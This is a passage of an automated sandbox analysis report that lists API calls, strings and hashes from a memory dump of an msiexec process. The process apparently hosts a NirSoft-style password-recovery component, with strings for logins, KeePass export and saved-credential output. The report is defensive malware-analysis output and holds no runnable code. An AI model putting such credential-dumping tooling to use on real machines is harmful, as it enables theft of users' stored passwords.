                                                                      • String ID: RTL$TranslatorName$TranslatorURL$Version$general$strings
                                                                      • API String ID: 3330709923-517860148
                                                                      • Opcode ID: 8014600ebdaa413990019ca607550d51b11cce94ae1a09dd3fff3b2e07bb1862
                                                                      • Instruction ID: fd1c33b42c1478e8908a3567a27dc6f764f3595523656020fa754494b197929d
                                                                      • Opcode Fuzzy Hash: 8014600ebdaa413990019ca607550d51b11cce94ae1a09dd3fff3b2e07bb1862
                                                                      • Instruction Fuzzy Hash: 2121ACB2D4021876D720B7929C46ECF7B6CAF41759F010477B90C72083DAB95B98CAAE
                                                                      APIs
                                                                        • Part of subcall function 0040CC26: GetFileSize.KERNEL32(00000000,00000000,000003FF,?,00000000,0040B7D4,?,?,?,?,000003FF,?,?,?,00445FAE,?), ref: 0040CC44
                                                                        • Part of subcall function 0040CC26: CloseHandle.KERNELBASE(?,?,000000FF,0000FDE9), ref: 0040CC98
                                                                        • Part of subcall function 0040CCF0: _wcsicmp.MSVCRT ref: 0040CD2A
                                                                      • memset.MSVCRT ref: 0040806A
                                                                      • memset.MSVCRT ref: 0040807F
                                                                      • _wtoi.MSVCRT(00000000,00000000,00000136,00000000,00000135,00000000,00000134,00000000,00000133,00000000,00000132,00000000,00000131,00000000,00000130,00000000), ref: 004081AF
                                                                      • _wcsicmp.MSVCRT ref: 004081C3
                                                                      • memset.MSVCRT ref: 004081E4
                                                                      • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,0000012E,000000FF,?,000003FF,00000000,00000000,0000012E,00000000,0000012D,?,?,?,?,?), ref: 00408218
                                                                      • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,000000FF,?,000003FF,00000000,00000000,?,?,?,?,?,?), ref: 0040822F
                                                                      • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,000000FF,?,000003FF,00000000,00000000,?,?,?,?,?,?), ref: 00408246
                                                                      • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,00000000,000000FF,?,000003FF,00000000,00000000,?,?,?,?,?,?), ref: 0040825D
                                                                      • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,00000000,000000FF,?,000003FF,00000000,00000000,?,?,?,?,?,?), ref: 00408274
                                                                        • Part of subcall function 00407FC3: _wtoi64.MSVCRT ref: 00407FC7
                                                                      • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,000000FF,?,000003FF,00000000,00000000,?,?,?,?,?,?), ref: 0040828B
                                                                        • Part of subcall function 00407E1E: memset.MSVCRT ref: 00407E44
                                                                        • Part of subcall function 00407E1E: memset.MSVCRT ref: 00407E5B
                                                                        • Part of subcall function 00407E1E: _mbscpy.MSVCRT(?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00407E7E
                                                                        • Part of subcall function 00407E1E: _mbscpy.MSVCRT(?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00407ED7
                                                                        • Part of subcall function 00407E1E: _mbscpy.MSVCRT(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00407EEE
                                                                        • Part of subcall function 00407E1E: _mbscpy.MSVCRT(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00407F01
                                                                        • Part of subcall function 00407E1E: wcscpy.MSVCRT ref: 00407F10
                                                                        • Part of subcall function 00407E1E: MultiByteToWideChar.KERNEL32(0000FDE9,00000000,?,000000FF,?,000003FF), ref: 00407F36
                                                                        • Part of subcall function 00407E1E: MultiByteToWideChar.KERNEL32(0000FDE9,00000000,?,000000FF,?,000003FF), ref: 00407F50
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000009.00000002.2613397301.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_9_2_400000_msiexec.jbxd
                                                                      Similarity
                                                                      • API ID: ByteCharMultiWide$memset$_mbscpy$_wcsicmp$CloseFileHandleSize_wtoi_wtoi64wcscpy
                                                                      • String ID: logins$null
                                                                      • API String ID: 2148543256-2163367763
                                                                      • Opcode ID: 09a376002f14fa1f9e0d48ac719059c44ef41498ede045729c177772a5669da3
                                                                      • Instruction ID: fdf7b148d119976dec4a4ca0125bd44813aaa3c4ab878784613783167982a03f
                                                                      • Opcode Fuzzy Hash: 09a376002f14fa1f9e0d48ac719059c44ef41498ede045729c177772a5669da3
                                                                      • Instruction Fuzzy Hash: 48713371904219AEEF10BBA2DD82DDF767DEF00318F10457FB508B61C2DA785E458BA9
                                                                      APIs
                                                                        • Part of subcall function 004096C3: CreateFileW.KERNELBASE(00000000,80000000,00000003,00000000,00000003,00000000,00000000,0044509F,00000000,?,00000000,00000104,00445E7E,?,?), ref: 004096D5
                                                                      • GetFileSize.KERNEL32(00000000,00000000,?,00000001,00000000,?,004089ED,?,?,?,0000001E,?,?,00000104), ref: 00408589
                                                                      • ??2@YAPAXI@Z.MSVCRT(00000001,?,004089ED,?,?,?,0000001E,?,?,00000104,?,?,00000104,?,?,00000104), ref: 0040859D
                                                                        • Part of subcall function 0040A2EF: ReadFile.KERNELBASE(00000000,00000000,004450DD,00000000,00000000,?,?,004450DD,00000000,00000000), ref: 0040A306
                                                                      • memset.MSVCRT ref: 004085CF
                                                                      • memset.MSVCRT ref: 004085F1
                                                                      • memset.MSVCRT ref: 00408606
                                                                      • strcmp.MSVCRT ref: 00408645
                                                                      • _mbscpy.MSVCRT(?,?,?,?,?,?), ref: 004086DB
                                                                      • _mbscpy.MSVCRT(?,?,?,?,?,?), ref: 004086FA
                                                                      • memset.MSVCRT ref: 0040870E
                                                                      • strcmp.MSVCRT ref: 0040876B
                                                                      • ??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,?,?,?,?,?,?,?,?,?,0000001E), ref: 0040879D
                                                                      • CloseHandle.KERNEL32(?,?,004089ED,?,?,?,0000001E,?,?,00000104,?,?,00000104,?,?,00000104), ref: 004087A6
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000009.00000002.2613397301.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_9_2_400000_msiexec.jbxd
                                                                      Similarity
                                                                      • API ID: memset$File$_mbscpystrcmp$??2@??3@CloseCreateHandleReadSize
                                                                      • String ID: ---
                                                                      • API String ID: 3437578500-2854292027
                                                                      • Opcode ID: 86eb99c19707b425fb2b039d8f5ba7922df37cc2677e68e6646184786069dd0e
                                                                      • Instruction ID: 4c5fbc017ddd4a43d5b0f69e9578b2b0908928dff5e121bfcb53d45818d158f6
                                                                      • Opcode Fuzzy Hash: 86eb99c19707b425fb2b039d8f5ba7922df37cc2677e68e6646184786069dd0e
                                                                      • Instruction Fuzzy Hash: 256191B2C0421DAADF20DB948D819DEBBBCAB15314F1140FFE558B3141DA399BC4CBA9
                                                                      APIs
                                                                      • memset.MSVCRT ref: 0041087D
                                                                      • memset.MSVCRT ref: 00410892
                                                                      • GetWindowsDirectoryW.KERNEL32(?,00000104), ref: 004108A4
                                                                      • SHGetFileInfoW.SHELL32(?,00000000,?,000002B4,00004001), ref: 004108C2
                                                                      • SendMessageW.USER32(?,00001003,00000001,?), ref: 004108FF
                                                                      • SendMessageW.USER32(?,00001003,00000000,?), ref: 00410936
                                                                      • GetModuleHandleW.KERNEL32(00000000), ref: 00410951
                                                                      • LoadImageW.USER32(00000000,00000085,00000000,00000010,00000010,00001000), ref: 00410963
                                                                      • GetModuleHandleW.KERNEL32(00000000), ref: 0041096E
                                                                      • LoadImageW.USER32(00000000,00000086,00000000,00000010,00000010,00001000), ref: 00410980
                                                                      • GetSysColor.USER32(0000000F), ref: 00410999
                                                                      • DeleteObject.GDI32(?), ref: 004109D0
                                                                      • DeleteObject.GDI32(?), ref: 004109D6
                                                                      • SendMessageW.USER32(00000000,00001208,00000000,?), ref: 004109F3
                                                                      Memory Dump Source
                                                                      • Source File: 00000009.00000002.2613397301.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_9_2_400000_msiexec.jbxd
                                                                      Similarity
                                                                      • API ID: MessageSend$DeleteHandleImageLoadModuleObjectmemset$ColorDirectoryFileInfoWindows
                                                                      • String ID:
                                                                      • API String ID: 1010922700-0
                                                                      • Opcode ID: 9f32c972fd3bed260489b92fc8884ca82be835491797332215144efe3993187c
                                                                      • Instruction ID: e9b684d61d60cc1afb152275eb3c8de820581b68aaecd99ee02cab8be193ddee
                                                                      • Opcode Fuzzy Hash: 9f32c972fd3bed260489b92fc8884ca82be835491797332215144efe3993187c
                                                                      • Instruction Fuzzy Hash: 48418575640304BFF720AF61DC8AF97779CFB09744F000829F399A51E1D6F6A8909B29
                                                                      APIs
                                                                        • Part of subcall function 0041739B: GetVersionExW.KERNEL32(?), ref: 004173BE
                                                                      • GetFullPathNameW.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000,?,00000000), ref: 004186AC
                                                                      • malloc.MSVCRT ref: 004186B7
                                                                      • free.MSVCRT ref: 004186C7
                                                                      • GetFullPathNameW.KERNEL32(00000000,-00000003,00000000,00000000), ref: 004186DB
                                                                      • free.MSVCRT ref: 004186E0
                                                                      • GetFullPathNameA.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000,?,00000000), ref: 004186F6
                                                                      • malloc.MSVCRT ref: 004186FE
                                                                      • GetFullPathNameA.KERNEL32(00000000,-00000003,00000000,00000000), ref: 00418711
                                                                      • free.MSVCRT ref: 00418716
                                                                      • free.MSVCRT ref: 0041872A
                                                                      • free.MSVCRT ref: 00418749
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000009.00000002.2613397301.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_9_2_400000_msiexec.jbxd
                                                                      Similarity
                                                                      • API ID: free$FullNamePath$malloc$Version
                                                                      • String ID: |A
                                                                      • API String ID: 3356672799-1717621600
                                                                      • Opcode ID: 66b970c2726a19c6cf161dcebd973c19408ec610aa0d83d05880a80435803f02
                                                                      • Instruction ID: f8a1ad7f3386c3a0ca67e8408a701755caa4d882ef8d2f884b3bc60851bd4b4d
                                                                      • Opcode Fuzzy Hash: 66b970c2726a19c6cf161dcebd973c19408ec610aa0d83d05880a80435803f02
                                                                      • Instruction Fuzzy Hash: F5217432900118BFEF11BFA6DC46CDFBB79DF41368B22006FF804A2161DA799E91995D
                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000009.00000002.2613397301.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_9_2_400000_msiexec.jbxd
                                                                      Similarity
                                                                      • API ID: _wcsicmp
                                                                      • String ID: /scomma$/shtml$/skeepass$/stab$/stabular$/sverhtml$/sxml
                                                                      • API String ID: 2081463915-1959339147
                                                                      • Opcode ID: 28c2ebe8ae336333f434d0f7201133c37a7c95e7bcc6e3a748ef2c38aa05b661
                                                                      • Instruction ID: 8733bd8b557f913067c5021fbfe18d0583d9fd94efe92a6f612d034962822ca0
                                                                      • Opcode Fuzzy Hash: 28c2ebe8ae336333f434d0f7201133c37a7c95e7bcc6e3a748ef2c38aa05b661
                                                                      • Instruction Fuzzy Hash: A401843328931228FA2538663D07F834F48CB52BBBF32405BF800D81C6FE8C4565605E
                                                                      APIs
                                                                        • Part of subcall function 0040A804: memset.MSVCRT ref: 0040A824
                                                                        • Part of subcall function 0040A804: GetSystemDirectoryW.KERNEL32(0045DE68,00000104), ref: 0040A841
                                                                        • Part of subcall function 0040A804: wcscpy.MSVCRT ref: 0040A854
                                                                        • Part of subcall function 0040A804: wcscat.MSVCRT ref: 0040A86A
                                                                        • Part of subcall function 0040A804: LoadLibraryW.KERNELBASE(00000000,?,?,?,?,?,?,?), ref: 0040A87B
                                                                        • Part of subcall function 0040A804: LoadLibraryW.KERNEL32(?,?,?,?,?,?,?,?), ref: 0040A884
                                                                      • GetProcAddress.KERNEL32(00000000,GetModuleBaseNameW), ref: 004138ED
                                                                      • GetProcAddress.KERNEL32(00000000,EnumProcessModules), ref: 004138FE
                                                                      • GetProcAddress.KERNEL32(00000000,GetModuleFileNameExW), ref: 0041390F
                                                                      • GetProcAddress.KERNEL32(00000000,EnumProcesses), ref: 00413920
                                                                      • GetProcAddress.KERNEL32(00000000,GetModuleInformation), ref: 00413931
                                                                      • FreeLibrary.KERNEL32(00000000), ref: 00413951
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000009.00000002.2613397301.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_9_2_400000_msiexec.jbxd
                                                                      Similarity
                                                                      • API ID: AddressProc$Library$Load$DirectoryFreeSystemmemsetwcscatwcscpy
                                                                      • String ID: EnumProcessModules$EnumProcesses$GetModuleBaseNameW$GetModuleFileNameExW$GetModuleInformation$psapi.dll
                                                                      • API String ID: 2012295524-70141382
                                                                      • Opcode ID: 95a5228713fab25b9356939e1698f0342648b454f81c78f9b3678221df1ca411
                                                                      • Instruction ID: 1ed0e205fb1d3ca6b4a3c81c58fecbd4dea9624ac3f9f6029147382c5f000437
                                                                      • Opcode Fuzzy Hash: 95a5228713fab25b9356939e1698f0342648b454f81c78f9b3678221df1ca411
                                                                      • Instruction Fuzzy Hash: 7301B5B1905312DAD7705F31AE40B6B2FA45B81FA7B10003BEA00D1286DBFCC8C5DA6E
                                                                      APIs
                                                                      • GetModuleHandleW.KERNEL32(kernel32.dll,?,0041339D), ref: 0041384C
                                                                      • GetProcAddress.KERNEL32(00000000,CreateToolhelp32Snapshot), ref: 00413865
                                                                      • GetProcAddress.KERNEL32(00000000,Module32First), ref: 00413876
                                                                      • GetProcAddress.KERNEL32(00000000,Module32Next), ref: 00413887
                                                                      • GetProcAddress.KERNEL32(00000000,Process32First), ref: 00413898
                                                                      • GetProcAddress.KERNEL32(00000000,Process32Next), ref: 004138A9
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000009.00000002.2613397301.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_9_2_400000_msiexec.jbxd
                                                                      Similarity
                                                                      • API ID: AddressProc$HandleModule
                                                                      • String ID: CreateToolhelp32Snapshot$Module32First$Module32Next$Process32First$Process32Next$kernel32.dll
                                                                      • API String ID: 667068680-3953557276
                                                                      • Opcode ID: 31f1d1be7c9a4426e09052d790ecb19dd0b8106983b19d46a1984a4086cae070
                                                                      • Instruction ID: ced2a49a11d8a5ad7e856d80fa96ce31c371be68fc2c17877008b9264e9f9212
                                                                      • Opcode Fuzzy Hash: 31f1d1be7c9a4426e09052d790ecb19dd0b8106983b19d46a1984a4086cae070
                                                                      • Instruction Fuzzy Hash: 58F08631900317A9E7206F357D41B672AE45B86F83714017BFC04D12D9DB7CE98A9B6D
                                                                      APIs
                                                                      • GetDC.USER32(00000000), ref: 004121FF
                                                                      • GetDeviceCaps.GDI32(00000000,0000005A), ref: 0041220A
                                                                      • ReleaseDC.USER32(00000000,00000000), ref: 0041221F
                                                                      • SetBkMode.GDI32(?,00000001), ref: 00412232
                                                                      • SetTextColor.GDI32(?,00FF0000), ref: 00412240
                                                                      • SelectObject.GDI32(?,?), ref: 00412251
                                                                      • DrawTextExW.USER32(?,?,000000FF,?,00000024,?), ref: 00412285
                                                                      • SelectObject.GDI32(00000014,00000005), ref: 00412291
                                                                        • Part of subcall function 00411FC6: GetCursorPos.USER32(?), ref: 00411FD0
                                                                        • Part of subcall function 00411FC6: GetSubMenu.USER32(?,00000000), ref: 00411FDE
                                                                        • Part of subcall function 00411FC6: TrackPopupMenu.USER32(00000000,00000002,?,?,00000000,?,00000000), ref: 0041200F
                                                                      • GetModuleHandleW.KERNEL32(00000000), ref: 004122AC
                                                                      • LoadCursorW.USER32(00000000,00000067), ref: 004122B5
                                                                      • SetCursor.USER32(00000000), ref: 004122BC
                                                                      • PostMessageW.USER32(?,00000428,00000000,00000000), ref: 00412304
                                                                      • memcpy.MSVCRT(?,?,00002008), ref: 0041234D
                                                                      Memory Dump Source
                                                                      • Source File: 00000009.00000002.2613397301.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_9_2_400000_msiexec.jbxd
                                                                      Similarity
                                                                      • API ID: Cursor$MenuObjectSelectText$CapsColorDeviceDrawHandleLoadMessageModeModulePopupPostReleaseTrackmemcpy
                                                                      • String ID:
                                                                      • API String ID: 1700100422-0
                                                                      • Opcode ID: da24f667188ca395770274d48ae20aaa805e07b53c3ccbe50e1108a3d75e9f91
                                                                      • Instruction ID: eb413d4c014922f01c1be241ee45634b3e5b5e29cfe5fc1015c733cb557b7a75
                                                                      • Opcode Fuzzy Hash: da24f667188ca395770274d48ae20aaa805e07b53c3ccbe50e1108a3d75e9f91
                                                                      • Instruction Fuzzy Hash: 0F61D331600109AFDB149F74CE89BEA77A5BB45300F10052AFA25D7291DBBC9CB1DB59
                                                                      APIs
                                                                      • GetClientRect.USER32(?,?), ref: 004111E0
                                                                      • GetWindowRect.USER32(?,?), ref: 004111F6
                                                                      • GetWindowRect.USER32(?,?), ref: 0041120C
                                                                      • GetDlgItem.USER32(00000000,0000040D), ref: 00411246
                                                                      • GetWindowRect.USER32(00000000), ref: 0041124D
                                                                      • MapWindowPoints.USER32(00000000,00000000,?,00000002), ref: 0041125D
                                                                      • BeginDeferWindowPos.USER32(00000004), ref: 00411281
                                                                      • DeferWindowPos.USER32(?,?,00000000,00000000,00000000,?,?,00000004), ref: 004112A4
                                                                      • DeferWindowPos.USER32(?,?,00000000,00000000,?,?,?,00000006), ref: 004112C3
                                                                      • DeferWindowPos.USER32(?,?,00000000,00000000,000000DC,?,?,00000004), ref: 004112EE
                                                                      • DeferWindowPos.USER32(?,00000000,00000000,00000000,?,?,000000DC,00000004), ref: 00411306
                                                                      • EndDeferWindowPos.USER32(?), ref: 0041130B
                                                                      Memory Dump Source
                                                                      • Source File: 00000009.00000002.2613397301.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_9_2_400000_msiexec.jbxd
                                                                      Similarity
                                                                      • API ID: Window$Defer$Rect$BeginClientItemPoints
                                                                      • String ID:
                                                                      • API String ID: 552707033-0
                                                                      • Opcode ID: 94434f3586c80254c14fe7888e5e60b5c724479e0532bb2ef8c61210f3daf4e7
                                                                      • Instruction ID: 1a89c9de14f4e003cb1acc22e2fe5cfe68aec74c13575a54a2aa846d798aa5ff
                                                                      • Opcode Fuzzy Hash: 94434f3586c80254c14fe7888e5e60b5c724479e0532bb2ef8c61210f3daf4e7
                                                                      • Instruction Fuzzy Hash: 3B41D375900209FFEB11DFA8DD89FEEBBBAFB48300F104469F655A61A0C771AA50DB14
                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000009.00000002.2613397301.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_9_2_400000_msiexec.jbxd
                                                                      Similarity
                                                                      • API ID: memset$_snwprintf
                                                                      • String ID: %%0.%df
                                                                      • API String ID: 3473751417-763548558
                                                                      • Opcode ID: d3ed19b3c5d3f5d27fcb945595af099acb5609e53fc24cbfd77fa4eb0abb8f2a
                                                                      • Instruction ID: e3e507119e413e1699737691dcc770ce903c50d69a4f0c7cc4f670013a5326e5
                                                                      • Opcode Fuzzy Hash: d3ed19b3c5d3f5d27fcb945595af099acb5609e53fc24cbfd77fa4eb0abb8f2a
                                                                      • Instruction Fuzzy Hash: 2D318F71800129BBEB20DF95CC85FEB77BCFF49304F0104EAB509A2155E7349A94CBA9
                                                                      APIs
                                                                      • SetTimer.USER32(?,00000041,00000064,00000000), ref: 004060C7
                                                                      • KillTimer.USER32(?,00000041), ref: 004060D7
                                                                      • KillTimer.USER32(?,00000041), ref: 004060E8
                                                                      • GetTickCount.KERNEL32 ref: 0040610B
                                                                      • GetParent.USER32(?), ref: 00406136
                                                                      • SendMessageW.USER32(00000000), ref: 0040613D
                                                                      • BeginDeferWindowPos.USER32(00000004), ref: 0040614B
                                                                      • EndDeferWindowPos.USER32(00000000), ref: 0040619B
                                                                      • InvalidateRect.USER32(?,?,00000001), ref: 004061A7
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000009.00000002.2613397301.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_9_2_400000_msiexec.jbxd
                                                                      Similarity
                                                                      • API ID: Timer$DeferKillWindow$BeginCountInvalidateMessageParentRectSendTick
                                                                      • String ID: A
                                                                      • API String ID: 2892645895-3554254475
                                                                      • Opcode ID: 9ab18b63844edbdd48863c33bac36f0a113902732bc81a80893c7cf372b99e85
                                                                      • Instruction ID: 3d646c34c65c30a23a549f03b0efc12359fcfb722ff8df3f2fd47db5f06942f8
                                                                      • Opcode Fuzzy Hash: 9ab18b63844edbdd48863c33bac36f0a113902732bc81a80893c7cf372b99e85
                                                                      • Instruction Fuzzy Hash: 67318F75240304BBEB205F62DC85F6A7B6ABB44742F018539F3067A5E1C7F998A18B58
                                                                      APIs
                                                                      • LoadMenuW.USER32(?,?), ref: 0040D97F
                                                                        • Part of subcall function 0040D7A7: GetMenuItemCount.USER32(?), ref: 0040D7BD
                                                                        • Part of subcall function 0040D7A7: memset.MSVCRT ref: 0040D7DC
                                                                        • Part of subcall function 0040D7A7: GetMenuItemInfoW.USER32 ref: 0040D818
                                                                        • Part of subcall function 0040D7A7: wcschr.MSVCRT ref: 0040D830
                                                                      • DestroyMenu.USER32(00000000), ref: 0040D99D
                                                                      • CreateDialogParamW.USER32(?,?,00000000,0040D952,00000000), ref: 0040D9F2
                                                                      • GetDesktopWindow.USER32 ref: 0040D9FD
                                                                      • CreateDialogParamW.USER32(?,?,00000000), ref: 0040DA0A
                                                                      • memset.MSVCRT ref: 0040DA23
                                                                      • GetWindowTextW.USER32(00000005,?,00001000), ref: 0040DA3A
                                                                      • EnumChildWindows.USER32(00000005,Function_0000D898,00000000), ref: 0040DA67
                                                                      • DestroyWindow.USER32(00000005), ref: 0040DA70
                                                                        • Part of subcall function 0040D5D6: _snwprintf.MSVCRT ref: 0040D5FB
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000009.00000002.2613397301.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_9_2_400000_msiexec.jbxd
                                                                      Similarity
                                                                      • API ID: Menu$Window$CreateDestroyDialogItemParammemset$ChildCountDesktopEnumInfoLoadTextWindows_snwprintfwcschr
                                                                      • String ID: caption
                                                                      • API String ID: 973020956-4135340389
                                                                      • Opcode ID: 5e414436bb8e275bf9a16e2693900a7463b03ad76ebaf029bad5c7ef584cf34d
                                                                      • Instruction ID: d77e6bedd7727d4aace6f5c0bd160524984489d6dc7b24eaa8e7ecc9459ec1fc
                                                                      • Opcode Fuzzy Hash: 5e414436bb8e275bf9a16e2693900a7463b03ad76ebaf029bad5c7ef584cf34d
                                                                      • Instruction Fuzzy Hash: 60319072900208BFEF11AF91DC85EAA3B78FF04315F10843AF909A61A1D7799D58CF59
                                                                      APIs
                                                                      Strings
                                                                      • <meta http-equiv='content-type' content='text/html;charset=%s'>, xrefs: 00410ADD
                                                                      • <br><h4>%s <a href="http://www.nirsoft.net/" target="newwin">%s</a></h4><p>, xrefs: 00410B3C
                                                                      • <table dir="rtl"><tr><td>, xrefs: 00410B00
                                                                      • <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 3.2 Final//EN">, xrefs: 00410A70
                                                                      Memory Dump Source
                                                                      • Source File: 00000009.00000002.2613397301.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_9_2_400000_msiexec.jbxd
                                                                      Similarity
                                                                      • API ID: memset$_snwprintf$wcscpy
                                                                      • String ID: <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 3.2 Final//EN">$<br><h4>%s <a href="http://www.nirsoft.net/" target="newwin">%s</a></h4><p>$<meta http-equiv='content-type' content='text/html;charset=%s'>$<table dir="rtl"><tr><td>
                                                                      • API String ID: 1283228442-2366825230
                                                                      • Opcode ID: 2928c1e4db6f8540118cb54ef1ff53e3c28d5a36283f281326c9c00f9b8dcb63
                                                                      • Instruction ID: da896b014e5ee892582fb8e7d48e4383de9842bc572d8210300f5843ce7472f7
                                                                      • Opcode Fuzzy Hash: 2928c1e4db6f8540118cb54ef1ff53e3c28d5a36283f281326c9c00f9b8dcb63
                                                                      • Instruction Fuzzy Hash: 5C2182B69002197BDB21AB95CC41EDE77BCAF08785F0040ABF549D3151DA789F888BA9
                                                                      APIs
                                                                      • wcschr.MSVCRT ref: 00413972
                                                                      • wcscpy.MSVCRT ref: 00413982
                                                                        • Part of subcall function 004097F7: wcslen.MSVCRT ref: 00409806
                                                                        • Part of subcall function 004097F7: wcslen.MSVCRT ref: 00409810
                                                                        • Part of subcall function 004097F7: _memicmp.MSVCRT ref: 0040982B
                                                                      • wcscpy.MSVCRT ref: 004139D1
                                                                      • wcscat.MSVCRT ref: 004139DC
                                                                      • memset.MSVCRT ref: 004139B8
                                                                        • Part of subcall function 00409DD5: GetWindowsDirectoryW.KERNEL32(0045DC58,00000104,?,00413A11,?,?,00000000,00000208,?), ref: 00409DEB
                                                                        • Part of subcall function 00409DD5: wcscpy.MSVCRT ref: 00409DFB
                                                                      • memset.MSVCRT ref: 00413A00
                                                                      • memcpy.MSVCRT(?,?,00000004,?,?,00000000,00000208,?), ref: 00413A1B
                                                                      • wcscat.MSVCRT ref: 00413A27
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000009.00000002.2613397301.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_9_2_400000_msiexec.jbxd
                                                                      Similarity
                                                                      • API ID: wcscpy$memsetwcscatwcslen$DirectoryWindows_memicmpmemcpywcschr
                                                                      • String ID: \systemroot
                                                                      • API String ID: 4173585201-1821301763
                                                                      • Opcode ID: e4551322c16c9acef98fc86a4838192e22c045fa3321ccd57a54cdfa3ae28df9
                                                                      • Instruction ID: a9582ad2fab6187976d7b5f1d827ce349b207672d34ede1993470c6c3fb504e1
                                                                      • Opcode Fuzzy Hash: e4551322c16c9acef98fc86a4838192e22c045fa3321ccd57a54cdfa3ae28df9
                                                                      • Instruction Fuzzy Hash: 7D21F6F68053146AE720FB619C86EEF73EC9F06719F20415FF115A20C6EA7C9A844B5E
                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000009.00000002.2613397301.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_9_2_400000_msiexec.jbxd
                                                                      Similarity
                                                                      • API ID: wcscpy
                                                                      • String ID: AppData$Common Desktop$Common Programs$Common Start Menu$Common Startup$Desktop$Favorites$Programs$Start Menu$Startup
                                                                      • API String ID: 1284135714-318151290
                                                                      • Opcode ID: dc6868dd8f5dbcd850853512a46c22a4be17f2be4da4ff30984607c28efcaa9d
                                                                      • Instruction ID: e2253d4fd864bfabc2f945990654e2d0feb0e3e4f5de9ed447e77a37a808a444
                                                                      • Opcode Fuzzy Hash: dc6868dd8f5dbcd850853512a46c22a4be17f2be4da4ff30984607c28efcaa9d
                                                                      • Instruction Fuzzy Hash: 04F0127526EA4161142406240E0DEF75509D0D575F3F74A537A02E89D6FCCDDEC6609F
                                                                      APIs
                                                                        • Part of subcall function 0040A32D: SetFilePointer.KERNEL32(0040C2BF,?,00000000,00000000,?,0040C0C5,00000000,00000000,?,00000020,?,0040C255,?,?,*.*,0040C2BF), ref: 0040A33A
                                                                      • GetFileSize.KERNEL32(00000000,00000000), ref: 0040C0D4
                                                                        • Part of subcall function 0040BFF3: _memicmp.MSVCRT ref: 0040C00D
                                                                        • Part of subcall function 0040BFF3: memcpy.MSVCRT(?,?,00000004,00000000,?,?,?,?,?,?,?,?,*.*,0040C2BF,00000000), ref: 0040C024
                                                                      • memcpy.MSVCRT(00000000,?,00000004,00000000,?,?,?,?), ref: 0040C11B
                                                                      • strchr.MSVCRT ref: 0040C140
                                                                      • strchr.MSVCRT ref: 0040C151
                                                                      • _strlwr.MSVCRT ref: 0040C15F
                                                                      • memset.MSVCRT ref: 0040C17A
                                                                      • CloseHandle.KERNEL32(00000000), ref: 0040C1C7
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000009.00000002.2613397301.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_9_2_400000_msiexec.jbxd
                                                                      Similarity
